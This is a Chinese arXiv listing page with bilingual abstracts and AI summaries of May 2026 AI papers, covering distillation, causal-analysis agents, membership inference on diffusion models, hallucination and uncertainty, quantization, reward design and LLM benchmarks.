在线策略蒸馏最近成为标准序列级模仿的有前途的替代方案,通过使用教师模型对学生自身的展开进行评分来训练学生。然而,我们观察到这种范式中的“离策略教师衰减”问题:对于后面的token,由于学生的早期轨迹作为上下文对于教师来说是离策略的,教师产生纠正性分数的能力会衰减,并可能退回到预训练阶段学习的token补全行为。我们通过实验验证了这个问题,并提出了早停展开(ESR)来解决它:一种简单而有效的蒸馏策略,仅限制展开生成到前几个响应token。我们表明,ESR在模型大小、家族、任务和训练制度上均超越了全展开在线策略蒸馏的性能,并且在跨模型家族场景下表现出更高的GPU效率和训练稳定性。我们进一步研究了这一惊人性能背后的机制,发现了ESR的“级联对齐”和“子模式承诺”效应,这可能解释其为何有效,甚至有时超过教师模型性能。此外,我们表明这种基于位置的token选择策略不能完全由KL散度和熵信号解释。

英文摘要

On-policy distillation has recently emerged as a promising alternative to standard sequence-level imitation, training a student by scoring its own rollouts with a teacher model. However, we observe an "Off-policy Teacher Decay" problem in this paradigm: for later tokens, the student's earlier trajectory serves as context that is off-policy for the teacher, so the teacher's ability to produce a corrective score decays, and it may fall back to token-completion behavior learned during pre-training. We empirically verify this problem and propose Early Stopping Rollout (ESR) to fix it: a simple yet effective distillation strategy that restricts rollout generation to the first few response tokens. We show that ESR both surpasses full-rollout on-policy distillation (OPD) across model sizes, families, tasks, and training regimes, and exhibits much higher GPU efficiency and training stability, especially in cross-model-family scenarios. We further investigate the mechanism behind this surprising performance and discover the "Cascading Alignment" and "Sub-mode Commitment" effects of ESR, which may explain why it works effectively and sometimes even exceeds the teacher model's performance. In addition, we show that this position-based token selection strategy cannot be fully explained by KL divergence and entropy signals.

2605.27022 2026-05-27 cs.AI 版本更新

ORCA: An End-to-End Interactive Copilot for Optimized Root Cause Analysis

ORCA:一种用于优化根因分析的端到端交互式副驾驶

Phi Nguyen Xuan, Nicholas Tagliapietra, Lavdim Halilaj, Kristian Kersting, Juergen Luettin

发表机构 * Robert Bosch GmbH, Germany; Bosch Global Software Technologies Company Limited, Vietnam; Computer Science Department, TU Darmstadt, Germany; Hessian Center for Artificial Intelligence (hessian.AI), Darmstadt; German Center for Artificial Intelligence (DFKI)

AI总结 提出ORCA,一种端到端因果分析副驾驶,通过编排智能体理解用户目标并引导其完成从全自动到高度用户引导的因果分析工作流,涵盖因果发现、效应估计、可解释性和根因分析,并生成结构化报告。

详情
AI中文摘要

因果分析是制造、社会科学和医学等多个领域的关键任务。然而,尽管近期取得了进展,因果方法的概念和方法复杂性使得领域专家难以使用。这一差距阻碍了专家利用这些进展,并阻碍了缺乏真实世界数据进行验证的研究人员。为了弥合这一鸿沟,我们引入了ORCA,一种用于端到端因果分析的副驾驶。ORCA编排智能体以理解用户的目标,并引导他们完成最合适的因果分析工作流,从全自动到高度用户引导的执行。它具有因果发现、因果效应估计、可解释性和根因分析(RCA)功能。ORCA评估和比较性能,生成关键指标和图表,并通过结构化报告生成洞察。我们强调了它在几个真实世界用例中的有效性。

英文摘要

Causal analysis is a crucial task in many domains, including manufacturing, social science, and medicine. However, despite recent progress, the conceptual and methodological complexity of causal methods makes them largely inaccessible to domain experts. This gap prevents experts from leveraging these advances and hinders researchers who lack access to real-world data for validation. To bridge this divide, we introduce ORCA, a copilot for end-to-end causal analysis. ORCA orchestrates agents to understand the user's goals and guide them through the most appropriate causal analysis workflow, from fully automatic to highly user-guided execution. It features causal discovery, causal effect estimation, explainability, and root cause analysis (RCA). ORCA evaluates and compares performance, produces key metrics and diagrams, and generates insights through structured reports. We highlight its effectiveness across several real-world use cases.

2605.27020 2026-05-27 cs.CV cs.AI 版本更新

Black-box Membership Inference Attacks on the Pre-training Data of Image-generation Models

黑盒成员推断攻击:针对图像生成模型的预训练数据

Tao Qi, Huili Wang, Yuanhong Huang, Wendan Wang, Lianchao Zhao, Jinrui Wang, Zichen Qin, Shangguang Wang, Yongfeng Huang

发表机构 * Beijing University of Posts and Telecommunications(北京邮电大学) Tsinghua University(清华大学)

AI总结 提出一种基于跨模态数据扰动的黑盒成员推断攻击框架SD-MIA,通过分析扩散模型对目标图像和扰动文本指令的去噪过程,有效检测预训练数据中的成员关系。

Comments 13 pages, 9 figures; CVPR 2026 camera-ready

详情
AI中文摘要

基于扩散的图像生成模型的快速发展引发了对涉及人类创建数据的潜在版权和隐私侵犯的严重担忧。成员推断攻击(MIA)已成为识别模型训练期间未经授权数据使用的有前景工具。现有方法通常评估模型对扰动嫌疑图像的去噪能力作为成员状态的指标。然而,此类特征的判别能力高度依赖于模型记忆程度,并且在应用于曝光较少的数据(例如预训练数据)时显著下降。尽管有几种方法尝试通过利用模型内部特征来增强检测,但这些特征在主流闭源图像生成平台中通常不可访问,限制了其实用性。在本文中,我们证明分析黑盒扩散模型如何对目标图像和相应的扰动文本指令进行去噪可以揭示更具区分性的成员线索。基于这一见解,我们提出了一种名为SD-MIA的黑盒成员推断攻击框架,该框架利用跨模态数据扰动机制来检测扩散模型中的预训练数据。我们在一个公共基准数据集和一个新构建的数据集上进行了广泛实验,每个数据集包含具有相同分布的预训练成员和非成员样本。实验结果表明,SD-MIA相比现有基线(包括那些具有不公平访问模型内部特征优势的基线)实现了更优的性能。

英文摘要

The rapid advancement of diffusion-based image generation models has raised serious concerns regarding potential copyright and privacy infringements involving human-created data. Membership inference attacks (MIAs) have emerged as a promising tool for identifying unauthorized data usage during model training. Existing methods typically assess a model's ability to denoise perturbed suspect images as an indicator of membership status. However, the discriminative power of such features is highly dependent on the degree of model memorization and deteriorates significantly when applied to less exposed data (e.g., pre-training data). Although several methods attempt to enhance detection by leveraging internal model features, these features are generally inaccessible in mainstream closed-source image generation platforms, limiting their practicality. In this paper, we demonstrate that analyzing how a black-box diffusion model denoises a target image and the corresponding perturbed textual instructions can reveal more distinctive membership cues. Based on this insight, we propose a black-box membership inference attack framework (named SD-MIA) that leverages a cross-modal data perturbation mechanism to detect pre-training data in diffusion models. We conduct extensive experiments on both a public benchmark dataset and a newly constructed dataset, each comprising pre-training member and non-member samples with identical distributions. Experimental results demonstrate that SD-MIA achieves superior performance compared to existing baselines, including those with the unfair advantage of accessing internal model features.

2605.27016 2026-05-27 cs.CL cs.AI cs.LG stat.ML 版本更新

Evaluating the Relevance of Uncertainty Estimators for LLM Hallucination

评估不确定性估计器与LLM幻觉的相关性

Yedidia Agnimo, Anna Korba, Annabelle Blangero, Nicolas Chesneau, Karteek Alahari

发表机构 * CREST, ENSAE Institut Polytechnique de Paris(CREST,巴黎高等理工学院) Ekimetrics France(法国Ekimetrics) Centre Inria de l’Université Grenoble Alpes(格勒诺布尔阿尔卑斯大学信息研究院)

AI总结 通过系统实证研究,评估信息论、基于采样和反思性等不确定性估计器与LLM幻觉之间的关联,发现关联性高度可变且通常较弱,挑战了将不确定性作为幻觉直接信号的做法。

Comments 35 pages, 7 figures, 9 tables

详情
AI中文摘要

大型语言模型(LLM)容易产生幻觉,即与输入或训练数据不符的陈述,阻碍了可靠部署。同时,许多不确定性估计(UE)方法被提出来量化模型置信度,并常被隐含地视为模型失败的代理。然而,不确定性与幻觉之间的关系尚未得到充分表征。我们对不确定性估计器与LLM幻觉之间的关联进行了系统的实证研究。我们不是假设这种关联,而是直接评估它在何时以及在多大程度上成立。我们考虑了多种不确定性估计器,包括信息论、基于采样和反思性估计器,并检查了它们在幻觉设置中的行为。我们的实验涵盖了内在幻觉(违反输入忠实性)和外在幻觉(相对于训练数据的无根据主张),使用了四个互补基准,包括RAGTruth和HalluLens。我们发现,这种关联性高度可变且通常较弱,取决于幻觉类型和所评估的LLM。这些结果挑战了将不确定性作为幻觉直接信号的做法,并阐明了何时它能提供可操作的信息。

英文摘要

Large language models (LLMs) are prone to hallucinations, i.e., statements unsupported by the input or training data, hindering reliable deployment. In parallel, numerous uncertainty estimation (UE) methods have been proposed to quantify model confidence and are often implicitly treated as proxies for model failure. However, the relationship between uncertainty and hallucinations remains insufficiently characterized. We present a systematic empirical study of the association between uncertainty estimators and hallucinations in LLMs. Rather than assuming this association, we evaluate directly when and to what extent it holds. We consider a diverse set of uncertainty estimators, including information-theoretic, sampling-based, and reflexive estimators, and examine their behavior across hallucination settings. Our experiments cover both intrinsic hallucinations (violations of input faithfulness) and extrinsic hallucinations (unsupported claims relative to training data), using four complementary benchmarks, including RAGTruth and HalluLens. We find that the association is highly variable and often weak, depending on the hallucination type and the LLM under evaluation. These results challenge the use of uncertainty as a direct signal of hallucination and clarify when it provides actionable information.
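One common way to quantify how well an uncertainty score tracks hallucination is the area under the ROC curve (AUROC), where 0.5 means no association. The abstract does not say which association measure the study uses, so the sketch below is an assumption for illustration, and the scores and labels are made up.

```python
def auroc(scores, labels):
    """Probability that a hallucinated answer gets a higher score than a faithful one."""
    pos = [s for s, y in zip(scores, labels) if y == 1]
    neg = [s for s, y in zip(scores, labels) if y == 0]
    if not pos or not neg:
        raise ValueError("need at least one example of each class")
    # Count pairwise wins; ties count as half a win.
    wins = sum(1.0 if p > n else 0.5 if p == n else 0.0 for p in pos for n in neg)
    return wins / (len(pos) * len(neg))


# Hypothetical uncertainty scores and hallucination labels (1 = hallucinated).
uncertainty = [0.9, 0.2, 0.6, 0.4, 0.7, 0.1]
hallucinated = [1, 0, 0, 1, 1, 0]
print(round(auroc(uncertainty, hallucinated), 3))
```

A value close to 0.5 on a given benchmark would correspond to the weak association the abstract describes.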

2605.27014 2026-05-27 cs.LO cs.AI 版本更新

ReasonOps: A Unified Operational Paradigm for Trustworthy Verified LLM Reasoning

ReasonOps: 可信验证的LLM推理的统一操作范式

Adnan Rashid

发表机构 * School of Electrical Engineering and Computer Science (SEECS), National University of Sciences and Technology(国立科技大学电气工程与计算机科学学院)

AI总结 本文提出ReasonOps,一种将推理视为持续监控、可验证、可靠性感知的操作过程的统一范式,整合语义解释、自动形式化、符号推理、定理证明、运行时保证、概率可靠性估计和自适应修正,以解决当前LLM推理中的逻辑不一致、幻觉符号转换等问题。

Comments 5 Pages

详情
AI中文摘要

大型语言模型(LLM)已将人工智能从主要生成系统转变为日益强大的推理代理。最近在定理证明、自动形式化、符号推理和工具增强语言模型方面的进展表明,在机器辅助形式推理方面取得了实质性进展。然而,当前的推理系统仍然存在隐藏的逻辑不一致、幻觉符号转换、无支持的定理应用以及有限可靠性保证。现有方法在形式验证、运行时保证、神经符号推理和可信人工智能(AI)研究社区之间仍然分散。本文介绍了ReasonOps,一种用于可信验证推理系统的统一操作范式。受DevOps和MLOps等操作生态系统的启发,ReasonOps将推理视为一个持续监控、可验证、可靠性感知的操作过程,而不是一个孤立的推理任务。所提出的范式将语义解释、自动形式化、符号推理、定理证明、运行时保证、概率可靠性估计和自适应修正整合到一个统一的推理生命周期中。本文进一步介绍了ReasonOps架构,使用自主制动系统分析示例演示了其工作流程,并讨论了其在未来安全关键自主AI系统中的潜在作用。我们认为,像ReasonOps这样的操作推理范式可能成为下一代可信AI生态系统的基础设施。

英文摘要

Large Language Models (LLMs) have transformed artificial intelligence from primarily generative systems into increasingly capable reasoning agents. Recent advances in theorem proving, autoformalization, symbolic reasoning, and tool-augmented language models demonstrate substantial progress toward machine-assisted formal reasoning. However, current reasoning systems still suffer from hidden logical inconsistencies, hallucinated symbolic transitions, unsupported theorem applications, and limited reliability guarantees. Existing approaches remain fragmented across formal verification, runtime assurance, neuro-symbolic reasoning and trustworthy Artificial Intelligence (AI) research communities. This paper introduces ReasonOps, a unified operational paradigm for trustworthy verified reasoning systems. Inspired by operational ecosystems such as DevOps and MLOps, ReasonOps treats reasoning as a continuously monitored, verifiable, reliability-aware operational process rather than an isolated inference task. The proposed paradigm integrates semantic interpretation, autoformalization, symbolic reasoning, theorem proving, runtime assurance, probabilistic reliability estimation, and adaptive correction into a unified reasoning lifecycle. The paper further presents the ReasonOps architecture, demonstrates its workflow using an autonomous braking system analysis example, and discusses its potential role in future safety-critical autonomous AI systems. We argue that operational reasoning paradigms such as ReasonOps may become foundational infrastructure for next-generation trustworthy AI ecosystems.

2605.27013 2026-05-27 cs.AI 版本更新

Generating Robust Portfolios of Optimization Models using Large Language Models

使用大型语言模型生成鲁棒的优化模型组合

Eleni Straitouri, Cheol Woo Kim, Milind Tambe

发表机构 * Max Planck Institute for Software Systems(马克斯·普朗克软件系统研究所) Harvard University(哈佛大学)

AI总结 提出一种利用LLM作为随机生成器和推理评估器的统一框架,生成鲁棒的优化模型组合,并保证在生成器或评估器之一与人类偏好对齐时组合中包含高质量候选模型。

Comments Accepted at the ICML 2026 LM4Plan Workshop

详情
AI中文摘要

数学优化是跨领域(如资源分配和规划)进行结构化决策的强大工具。然而,制定忠实于现实的优化模型仍然是一个重大瓶颈,因为它通常需要领域专业知识和优化知识,而这些往往是稀缺的。最近大型语言模型(LLM)的进展有望弥合这一差距,使得从自然语言描述中生成候选优化模型成为可能。然而,无法保证任何单个LLM生成的模型是可靠的,因此仅输出一个模型的现有方法存在风险。在这项工作中,我们提出了一种新颖的算法,生成一个优化模型组合,旨在对LLM的局限性具有鲁棒性。我们的方法利用了一个观察:单个LLM可以扮演两个不同的角色——作为随机生成器和作为推理评估器——并提出了一个统一的框架,以互补的方式利用这两种能力。我们提供了理论保证,表明只要生成器或评估器中至少有一个与人类偏好良好对齐,该组合就保证包含高质量的候选模型,从而实现一个原则性的人机交互过程,决策者可以在承诺使用一个模型之前审查多个候选模型。我们进一步通过实验验证了我们的方法,展示了在一系列优化建模任务中的强大性能。

英文摘要

Mathematical optimization is a powerful tool for structured decision-making across domains such as resource allocation and planning. Formulating optimization models faithful to reality, though, remains a significant bottleneck as it typically demands both domain expertise and optimization knowledge that are often scarce. Recent advances in large language models (LLMs) promise to bridge this gap, enabling the generation of candidate optimization models from natural language descriptions. However, there is no guarantee that any single LLM-generated model is reliable, and existing approaches that output only one model are therefore risky. In this work, we propose a novel algorithm that generates a portfolio of optimization models, designed to be robust to the limitations of LLMs. Our method exploits the observation that a single LLM can play two distinct roles (as a stochastic generator and as a reasoning evaluator) and proposes a unified framework that leverages both capabilities in a complementary manner. We provide theoretical guarantees showing that, as long as either the generator or the evaluator is well-aligned with human preferences, the portfolio is guaranteed to contain high-quality candidates, enabling a principled human-in-the-loop process in which a decision-maker can review multiple candidates before committing to one. We further validate our approach empirically, demonstrating strong performance across a range of optimization modeling tasks.

2605.27003 2026-05-27 cs.CV cs.AI 版本更新

Timestep-Aware SVDQuant-GPTQ for W4A4 Quantization of Wan2.2-I2V

时间步感知的 SVDQuant-GPTQ 用于 Wan2.2-I2V 的 W4A4 量化

Junhao Wu, Dezhong Yao, Hai Jin

发表机构 * National Engineering Research Center for Big Data Technology and System(大数据技术与系统国家工程研究中心) Services Computing Technology and System Lab(服务计算技术与系统实验室) Cluster and Grid Computing Lab(集群与网格计算实验室) School of Computer Science and Technology(计算机科学与技术学院) Huazhong University of Science and Technology(华中科技大学)

AI总结 针对 Wan2.2-I2V 视频扩散 Transformer 的 W4A4 量化,提出结合 SVDQuant 低秩异常补偿、GPTQ 重建感知残差权重量化和时间步分箱逐层激活裁剪比搜索的后训练量化框架,在 OpenS2V-Eval 上降低 59.3% 峰值显存且仅损失 0.9% VBench 平均分。

详情
AI中文摘要

大型视频扩散 Transformer 的 W4A4 量化提供了显著的内存节省,但面临两个主要挑战:稀疏的大幅度激活异常值,以及跨多步去噪轨迹的强时间步依赖的激活分布。这些困难因 Wan2.2-I2V 的双专家混合专家 DiT 设计而加剧,其高噪声和低噪声专家表现出不同的量化敏感性,单一全局校准策略无法捕捉。我们提出了一种后训练量化框架,结合基于 SVDQuant 的低秩异常补偿、基于 GPTQ 的重建感知残差权重量化,以及针对每个专家独立进行的时间步分箱逐层激活裁剪比搜索。在 OpenS2V-Eval 基准上,我们的方法相对于 BF16 基线将峰值 GPU 内存降低了 59.3%,同时仅导致 VBench 平均分数下降 0.9%,成像质量下降 2.3%,表明专家和时间步感知的校准对于 MoE 视频 DiT 的高保真 W4A4 推理至关重要。

英文摘要

W4A4 quantization of large video diffusion Transformers offers substantial memory savings but is hindered by two main challenges: sparse large-magnitude activation outliers, and strongly timestep-dependent activation distributions across the multi-step denoising trajectory. These difficulties are compounded by Wan2.2-I2V's two-expert Mixture-of-Experts DiT design, whose high-noise and low-noise experts exhibit distinct quantization sensitivities that a single global calibration policy cannot capture. We propose a post-training quantization framework combining SVDQuant-based low-rank outlier compensation, GPTQ-based reconstruction-aware residual weight quantization, and timestep-bin-wise per-layer activation clipping-ratio search conducted independently for each expert. On the OpenS2V-Eval benchmark, our method reduces peak GPU memory by 59.3% relative to the BF16 baseline while incurring only a 0.9% drop in VBench average score and a 2.3% drop in Imaging Quality, demonstrating that expert- and timestep-aware calibration is essential for high-fidelity W4A4 inference on MoE video DiTs.
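A timestep-bin-wise clipping-ratio search can be sketched in a few lines. The abstract does not state the search objective or grid, so this assumes a grid search that minimizes the mean squared error of symmetric 4-bit fake quantization, run separately for each timestep bin. The function names, the grid, and the sample activations are hypothetical, and the per-layer and per-expert loops are omitted.

```python
def fake_quantize(values, clip_ratio, levels=7):
    """Clip to clip_ratio * max|x|, then round onto a symmetric signed grid.

    levels=7 uses integer codes in [-7, 7], a common symmetric 4-bit choice.
    """
    clip = clip_ratio * max(abs(v) for v in values)
    if clip == 0.0:
        return [0.0 for _ in values]
    scale = clip / levels
    return [round(max(-clip, min(clip, v)) / scale) * scale for v in values]


def mse(a, b):
    return sum((x - y) ** 2 for x, y in zip(a, b)) / len(a)


def search_clip_ratio(values, grid):
    """Pick the clipping ratio with the lowest reconstruction error."""
    return min(grid, key=lambda r: mse(values, fake_quantize(values, r)))


def calibrate(acts_by_bin, grid=(0.5, 0.6, 0.7, 0.8, 0.9, 1.0)):
    """Run the search independently for every timestep bin."""
    return {name: search_clip_ratio(vals, grid) for name, vals in acts_by_bin.items()}


# Made-up activations: one bin carries a large outlier, the other does not.
acts_by_bin = {
    "early_steps": [0.1 * i for i in range(-20, 21)] + [12.0],
    "late_steps": [0.05 * i for i in range(-20, 21)],
}
ratios = calibrate(acts_by_bin)
print(ratios)
```

Keeping one ratio per bin is what lets the calibration follow activation statistics that change along the denoising trajectory.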

2605.26969 2026-05-27 cs.CL cs.AI 版本更新

Recon: Reconstruction-Guided Reasoning Synthesis for User Modeling

Recon:基于重建指导的推理合成用于用户建模

Alan Zhu, Mihran Miroyan, Carolyn Wang, Andrew Zhou, Lisa Dunlap, Narges Norouzi, Joseph E. Gonzalez

发表机构 * University of California, Berkeley(加州大学伯克利分校)

AI总结 提出Recon方法,通过动作重建分数评估推理轨迹的预测能力,以改进用户建模中的推理合成,在多个领域优于事后合理化基线。

详情
AI中文摘要

用户建模旨在使用语言模型(LM)从过去的上下文-动作对(例如对话轮次)语料库中模拟个体的行为,从而在行为科学、人机协作和市场研究等环境中模拟用户。最近的方法通过合成推理轨迹来扩充这些语料库,通常通过同时以上下文和动作为条件生成。然而,这种条件构成事后合理化而非推理:轨迹保证证明动作的合理性,但可能不编码潜在的潜在因果决策路径。我们提出Recon,它使用动作重建通过预测能力对推理轨迹进行评分:给定上下文和候选推理,重建模型预测动作,重建保真度决定推理质量。在四个领域,Recon相对于标准事后合理化基线Backward Synthesis实现了54.7%的胜率。此外,我们发现使用来自Recon的奖励训练推理合成模型可提高下游用户建模性能,相对于基线实现了高达70.0%的胜率。我们进一步表明,Recon合成的推理可跨模型迁移,并改善重建模型之外的用户建模。我们的工作表明,事后合理化对于推理合成是不够的,有用且可解释的推理应自然地从上下文中引出动作。

英文摘要

User modeling aims to use language models (LMs) to mimic an individual's behavior from a corpus of past context-action pairs (e.g., conversation turns), enabling the simulation of users in settings like behavioral science, human-AI collaboration, and market research. Recent approaches augment these corpora with synthesized reasoning traces, typically generated by conditioning on both context and action. However, such conditioning constitutes post-hoc rationalization rather than reasoning: the trace is guaranteed to justify the action, but may not encode the underlying latent causal decision paths. We propose Recon, which uses action reconstruction to score reasoning traces by their predictive power: given a context and candidate reasoning, a reconstruction model predicts the action, and reconstruction fidelity determines reasoning quality. Across four domains, Recon achieves a 54.7% win rate over Backward Synthesis, a standard post-hoc rationalization baseline. Further, we find that training a reasoning synthesis model with rewards derived from Recon improves downstream user modeling performance, achieving a win rate of up to 70.0% over baselines. We further show that Recon-synthesized reasoning transfers across models, and improves user modeling beyond the reconstruction model. Our work demonstrates that post-hoc rationalization is insufficient for reasoning synthesis, and that useful and interpretable reasoning should naturally elicit the action from the context.

2605.26958 2026-05-27 cs.CL cs.AI 版本更新

Tournament-GRPO: Group-Wise Tournament Rewards for Reinforcement Learning in Open-Ended Long-Form Generation

Tournament-GRPO:面向开放式长文本生成强化学习的群组锦标赛奖励

Zixuan Yang, Yiqun Chen, Wei Yang, Erhan Zhang, Zihan Shen, Xiaochi Wei, Yan Gao, Yi Wu, Yao Hu, Jiaxin Mao

发表机构 * Renmin University of China(中国人民大学) University of Southern California(南加州大学) Zhejiang University(浙江大学) Xiaohongshu Inc.(小红书公司)

AI总结 针对开放式长文本生成中缺乏可靠参考答案和自动评估指标的问题,提出Tournament-GRPO框架,通过同一查询生成结果间的多轮锦标赛比较将基于评分细则的LLM评判转化为相对奖励,在Deep Research Bench上取得4.52分提升。

详情
AI中文摘要

开放式长文本生成中的强化学习具有挑战性,因为可靠的参考答案和自动评估指标通常不可用。现有的基于评分细则的方法通常依赖于逐点的LLM作为评判的评分,但绝对分数难以在复杂响应间校准,可能对同一查询的生成结果提供弱区分度,并在优化过程中饱和。我们提出Tournament-GRPO,一种群组奖励框架,通过同一查询生成结果间的重复多轮锦标赛将基于评分细则的LLM评判转化为相对奖励。Tournament-GRPO在群组内比较候选结果,累积锦标赛结果,并将其归一化为用于GRPO训练的群组奖励。在Deep Research Bench上的实验表明,Tournament-GRPO持续优于现有的奖励设计基线,在最强基线上实现了4.52分的整体分数提升。进一步分析表明,锦标赛奖励提供了有利的有效性-效率权衡,并且锦标赛设计影响训练动态。这些结果表明,基于评分细则的锦标赛比较为开放式长文本生成中的强化学习提供了有效的奖励信号。

英文摘要

Reinforcement learning in open-ended long-form generation is challenging because reliable reference answers and automatic metrics are often unavailable. Existing rubric-based methods typically rely on pointwise LLM-as-a-judge scoring, but absolute scores are difficult to calibrate across complex responses, may provide weak discrimination among same-query rollouts, and can become saturated during optimization. We propose Tournament-GRPO, a group-wise reward framework that converts rubric-guided LLM judgments into relative rewards through repeated multi-round tournaments among same-query rollouts. Tournament-GRPO compares candidates within groups, accumulates tournament outcomes, and normalizes them into group-wise rewards for GRPO training. Experiments on Deep Research Bench show that Tournament-GRPO consistently outperforms existing reward-design baselines, achieving a 4.52-point overall-score improvement over the strongest baseline. Further analyses show that tournament rewards provide a favorable effectiveness-efficiency trade-off and that tournament design affects training dynamics. These results suggest that rubric-guided tournament comparison provides an effective reward signal for reinforcement learning in open-ended long-form generation.
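The compare, accumulate, and normalize steps might look roughly like the sketch below. The abstract does not specify the tournament format, so random pairing in each round, win counting, and mean/standard-deviation normalization are assumptions. The `judge` callable is a hypothetical stand-in for a rubric-guided LLM comparison, and the toy judge here simply prefers longer strings.

```python
import random
import statistics


def tournament_rewards(candidates, judge, rounds=3, seed=0):
    """Turn pairwise judgments among same-query rollouts into normalized rewards."""
    rng = random.Random(seed)
    wins = [0.0] * len(candidates)
    for _ in range(rounds):
        order = list(range(len(candidates)))
        rng.shuffle(order)
        # Pair adjacent candidates; with an odd group size the last one sits out.
        for a, b in zip(order[0::2], order[1::2]):
            winner = a if judge(candidates[a], candidates[b]) else b
            wins[winner] += 1.0
    mean = statistics.fmean(wins)
    std = statistics.pstdev(wins)
    if std == 0:
        return [0.0] * len(wins)  # no signal when every candidate ties
    return [(w - mean) / std for w in wins]


# Toy rollouts and a toy judge (True means the first argument is better).
candidates = ["short", "a bit longer", "the longest answer here", "mid size"]
judge = lambda a, b: len(a) > len(b)
rewards = tournament_rewards(candidates, judge)
print(rewards)
```

Because the rewards are relative within the group, they stay informative even when an absolute rubric score would rate every rollout similarly.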

2605.26956 2026-05-27 cs.AI cs.CL 版本更新

LELA: An End-to-end LLM-based Entity Linking Framework with Zero-shot Domain Adaptation

LELA: 一种基于LLM的端到端实体链接框架,支持零样本领域自适应

Samy Haffoudhi, Nikola Dobričić, Fabian Suchanek, Nils Holzenberger

AI总结 本文提出LELA,一种基于大语言模型的模块化、领域无关的实体消歧方法,并扩展为实用的Python库,集成零样本命名实体识别,实现端到端实体链接,实验验证其跨领域性能与鲁棒性。

详情
Journal ref
35th International Joint Conference on Artificial Intelligence (IJCAI-ECAI 2026), IJCAI (International Joint Conferences on Artificial Intelligence), Aug 2026, Bremen (DE), Germany
AI中文摘要

实体链接是许多下游NLP系统的关键组件,但现有方法通常依赖于特定的目标知识库和领域,限制了其实际应用。在本文中,我们将LELA(一种模块化且领域无关的基于LLM的实体消歧方法)扩展为一个实用的Python库,该库集成了零样本命名实体识别(NER),从而为实际使用中的实体链接提供了完整的端到端流水线。我们提供了实验结果,验证了LELA在不同实体链接设置下的性能和鲁棒性。在我们的演示中,用户可以在自己的输入文本上试用该系统。

英文摘要

Entity linking is a key component of many downstream NLP systems, yet existing approaches are often tied to specific target knowledge bases and domains, limiting their real-world application. In this paper, we extend LELA, a modular and domain-agnostic LLM-based entity disambiguation method, into a practical Python library that integrates zero-shot Named Entity Recognition (NER), thereby providing a complete end-to-end pipeline for entity linking in real-world usage. We provide experimental results validating LELA's performance and robustness across diverse entity linking settings. In our demo, users can try the system on their own input texts.

2605.26955 2026-05-27 cs.CL cs.AI 版本更新

JuICE: A Benchmark for Evaluating LLM-Judge in Identifying Cultural Errors

JuICE:评估LLM裁判识别文化错误的基准

Jiho Jin, Junho Myung, Juhyun Oh, Junyeong Park, Rifki Afina Putri, Sunipa Dev, Vinodkumar Prabhakaran, Alice Oh

发表机构 * KAIST(韩国科学技术院) Google(谷歌) Universitas Gadjah Mada(加查马达大学)

AI总结 提出JuICE基准,包含7470个文化语言错误标注的多语言数据集,用于评估LLM裁判在长文本中识别深层文化错误的能力,发现最强模型F1仅0.52且常遗漏本地人易识别的错误。

详情
AI中文摘要

随着大型语言模型(LLM)越来越多地部署给全球用户,它们被整合到不同文化背景下的日常任务中,从起草个人通信到头脑风暴创意想法。这些任务本质上是文化性的:它们需要语境适当性、象征共鸣以及母语者本能依赖的隐性文化期望,这意味着一个回答可能在事实上合理,但对本地读者来说却明显错误。现有的文化基准通过事实验证或规范蕴含方法将文化视为一组扁平的事实,并采用LLM作为裁判,而未检查它们是否能捕捉到这种深层的文化错误。为填补这一空白,我们提出了JuICE(LLM裁判识别文化错误基准),这是一个多语言数据集,包含7470个跨度级别的文化语言错误标注,涵盖来自四个国家(美国、韩国、印度尼西亚和孟加拉国)的1050个查询-响应对,使用英语和这些国家的主要语言。利用JuICE,我们发现即使是最强的LLM裁判在错误跨度检测任务中也仅达到0.52的F1分数。此外,LLM裁判始终会遗漏本地居民容易识别的深层文化错误。我们的研究结果表明,稳健的文化评估必须超越表面级别的检测,转向考虑文化意义的深度和情境性的框架。

英文摘要

As large language models (LLMs) are increasingly deployed to users around the world, they are integrated into everyday tasks across diverse cultural contexts, from drafting personal communications to brainstorming creative ideas. These tasks are inherently cultural: they require contextual appropriateness, symbolic resonance, and tacit cultural expectations that native speakers draw on instinctively, meaning that a response can be factually plausible yet unmistakably wrong to a local reader. Existing cultural benchmarks have treated culture as a flat set of facts via fact verification or norm entailment methods, and have adopted LLM-as-a-Judge without examining whether they can capture such thick cultural errors. To address this gap, we present JuICE (Benchmark for LLM-Judge in Identifying Cultural Errors), a multilingual dataset of 7,470 span-level annotations of cultural and linguistic errors in long-form LLM responses. It covers 1,050 query-response pairs from four countries (the United States, South Korea, Indonesia, and Bangladesh), in both English and their countries' main languages. Using JuICE, we find that even the strongest LLM-judge achieves only an F1 of 0.52 in the erroneous span detection task. Furthermore, LLM-judges consistently miss thick cultural errors that local residents readily identify. Our findings suggest that robust cultural evaluation must move beyond surface-level detection toward frameworks that account for the depth and situatedness of cultural meaning.

2605.26937 2026-05-27 cs.CL cs.AI 版本更新

Beyond Questions: Evaluating What Large Language Models (Actually) Know

超越问题:评估大型语言模型(实际)知道什么

Luca Giordano, Simon Razniewski

发表机构 * ScaDS.AI Dresden/Leipzig & TU Dresden, Germany(ScaDS.AI 德累斯顿/莱比锡及德累斯顿工业大学,德国)

AI总结 提出开放知识评估新范式,通过开放式提示(如“告诉我关于M.L. King的一切”)评估模型自然表达的知识,并构建BeQu基准测试10,000个实体。

详情
AI中文摘要

大型语言模型(LLM)中的参数化知识是其成功的基石,但仍未被充分理解。现有的知识基准通常依赖于预定义的问题(例如,“M.L. King的出生日期是什么?”),仅评估基准设计者明确选择查询的知识,这是一种有问题的可用性偏差。在本文中,我们引入了开放知识评估,这是一种用于LLM知识基准测试的新范式。它不提出狭隘的问题,而是评估模型在响应开放式引发提示(例如,“告诉我关于M.L. King的一切”)时选择呈现的知识。这将焦点从预定义的答案检索转向表征模型自然表达的知识。我们用BeQu(超越问题)实例化这一范式,这是一个包含10,000个实体并配有用于陈述验证的参考语料库的基准。使用BeQu,我们评估了广泛的语言模型,并分析了推理努力、模型规模、提示格式和知识领域的影响。数据和排行榜可在此工作的GitHub仓库和基准网站上获取。

英文摘要

